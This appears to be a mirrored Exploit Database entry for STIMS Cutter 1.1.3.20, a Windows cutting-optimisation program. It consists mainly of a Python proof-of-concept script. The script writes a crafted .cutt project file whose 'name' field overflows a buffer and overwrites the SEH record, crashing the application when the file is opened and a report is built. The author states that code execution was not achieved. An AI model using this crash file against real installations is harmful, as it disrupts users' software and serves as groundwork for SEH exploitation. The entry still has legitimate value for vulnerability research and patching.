STIMS Cutter 1.1.3.20 – Buffer Overflow (Denial of Service) (PoC)

• Exploit Database
• 11 阅读

• 作者： Shantanu Khandelwal
  日期： 2016-02-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39472/

• # Exploit Title: STIMS CUTTER OVERFLOW SEH OVERWRITE
  # Date: 19 Feb 2016
  # Exploit Author: Shantanu Khandelwal <shantanu561993@gmail.com
  <ishitasailor@gmail.com>>
  # Vendor Homepage: http://www.stimslabs.com/
  # Software Link: http://www.stimslabs.com/en/cutter/STIMSCutterEnSetup.exe
  # Version: 1.1.3.20
  # Tested on: Windows XP SP3
  # CVE : UNKNOWN
  # ==============HOW TO CRASH ==================
  #make the cutt file and open it it the STIMS Cutter application.
  #Click on Build Report
  #===========================================
  #Problems in exploitation
  #Unable to find suitable SEH pointer
  #
  
  
  #!/usr/bin/env python
  f=open("crash.cutt","w")
  
  payload = """<!--block:#solution-->
  [solution]
  name="""
  payload+="A"*8452
  payload +="BBBB" #SEH overwrite
  payload +="""CCCC
  desc=A
  time=0
  version=1
  file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt
  time.created=131003117142810000
  app=1.1.3
  projects=1
  <!--#solution:block-->
  <!--block:A-->
  [properties]
  optimize=0
  level=0
  diversity=0
  status=0
  active=1
  remnants=0
  sort=0
  version=1
  desc=S
  comment=
  comment.active=0
  notes=
  notes.active=0
  material=A
  progress=100
  calculation=0D99FF12
  cost=222.000
  time.gone=0
  time.date=2016 Feb 18 23.29.14
  payload=2
  file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt
  app=1.1.3
  
  [order.blanks]
  b001={ "uid": "908113387", "material": "A", "length": "222", "quantity":
  "1", "knife": "1", "indent": "11", "cost": "1.0", "comment": "1", "id":
  "1", "name": "a" }
  
  [order.pieces]
  p001={ "uid": "124270241", "material": "A", "length": "111", "quantity":
  "1", "label": "1", "comment": "1", "id": "1", "name": "a", "orphans": "0" }
  
  [layout.summary]
  summary={ "output": "112.000", "used.len": "222.000", "used": "1",
  "pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1",
  "remnants": "0.000", "srest": "110.000", "cost": "222.000", "cost.ppu":
  "1.982", "brest": "110.0", "status": "", "type": "summary", "time.gone":
  "0", "time.date": "2016 Feb 18 23.29.14" }
  blank01={ "name": "a", "cost": "1.000000", "blank": "1", "used": "1",
  "pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "output":
  "112.000", "used.len": "222.000", "cost.sum": "222.000", "cost.ppu":
  "1.982", "remnants": "0.000" }
  
  [layout.cuttings]
  c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1",
  "shifts": "1", "output": "#1 1", "layout": "111" }
  
  [layout.cuttings.parts]
  c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1",
  "shifts": "1", "output": "#1 1", "layout": "111", "name": "1" }
  <!--A:block-->
  """
  
  f.write(payload)
  f.close()